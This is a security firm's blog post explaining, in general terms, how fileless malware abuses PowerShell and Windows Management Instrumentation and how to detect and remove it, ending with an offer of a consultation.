Examining Fileless Malware Threats
Most malware is file-based, meaning that your computer is infected as a result of a file being downloaded and run on your computer. This makes detection and removal easier for antivirus software since it can generate signatures of the malware files and look for those files on disk to detect and remove them.
Conversely, fileless malware is designed to not leave a file on disk to be scanned and compared to signature algorithms. This type of threat instead takes advantage of programs already installed on your computer to perform its desired functions.
We’ll discuss how this works, followed by strategies for identifying and removing fileless malware on your computer.
How Fileless Malware Works
Hackers are pros at twisting benign software to suit their own purposes. Many of the most common tools used by hackers were developed by network defenders and administrators and repurposed by hackers since their functionality met the hackers’ needs. The fileless malware threat is the logical progression of this.
All computer operating systems have built-in software designed to enable administrators and power users to take full advantage of the computer’s functionality. A simple example of this is the Windows command line and its more powerful version, Windows PowerShell. An experienced user can write commands or even develop scripts for PowerShell, just like a programmer can develop Python scripts. The advantage of PowerShell over Python or Ruby is that it comes installed by default on all Windows machines.
Instead of installing and executing standalone programs on a target computer, fileless malware is designed to take advantage of the functionality built into the target computer.
For example, Windows fileless malware can be designed as a collection of PowerShell commands and Windows Management Instrumentation (a tool designed to help with enterprise-scale administration of computers) that accomplishes the same functionality as a traditional malware executable using the native functionality of the Windows OS. Windows is designed to make organization-wide administration easy, but there is a fine line between legitimate administration and malicious activity and Windows provides the tools necessary for both.
How to Detect Fileless Malware
Fileless malware lacks many of the indicators used to detect traditional malware threats. It doesn’t install any files on the disk and is primarily located in memory, which makes it more difficult to detect with traditional techniques.
One of the best ways to detect fileless malware is through behavior-based anomaly detection. The actions taken by the malware, including running PowerShell scripts and interacting with Windows Management Instrumentation, are likely outside of the normal use of the infected machine and may be detectable based on this fact.
By enabling both host-based and network-based logging and performing automated and manual log analysis of log files, it may be possible to identify when a computer was infected by fileless malware, the scope of the infection and the tools and techniques used by the infecting malware.
Fileless Malware Removal
Due to its usage of deep-level operating system functionality, it can be difficult to locate and remove all aspects of a fileless malware infection. Windows Powershell and the Windows Management Instrumentation framework have access to the registry and other functionality that is commonly used for malware persistence.
The first step to removing a fileless malware infection is identifying the scope and type of threat you are experiencing. Depending on the results of the detection process, you may be able to identify the specific malware sample or at least classify it based on behavior and probably functionality. If not, the next best step is to begin an in-depth analysis of log and network files to see if you can identify what services the malware is using, when the initial infection occurred, and hopefully identify the infection vector. This may provide sufficient information for identification and a basis for research into the specific malware’s capabilities and recommended removal techniques.
Fileless malware typically makes use of persistence techniques to ensure that it begins executing again after it is terminated or the infected computer is restarted. Our previous blog post discussed some of the most common persistence methods used by malware, where to look for malware and what to look for when attempting to remove it.
Fileless malware can be complicated to detect, identify, and completely remove from a system. If you suspect your computer has been infected, it may be wise to reach out to a team of experts in malware identification and removal. Contact Sword & Shield for a free consultation.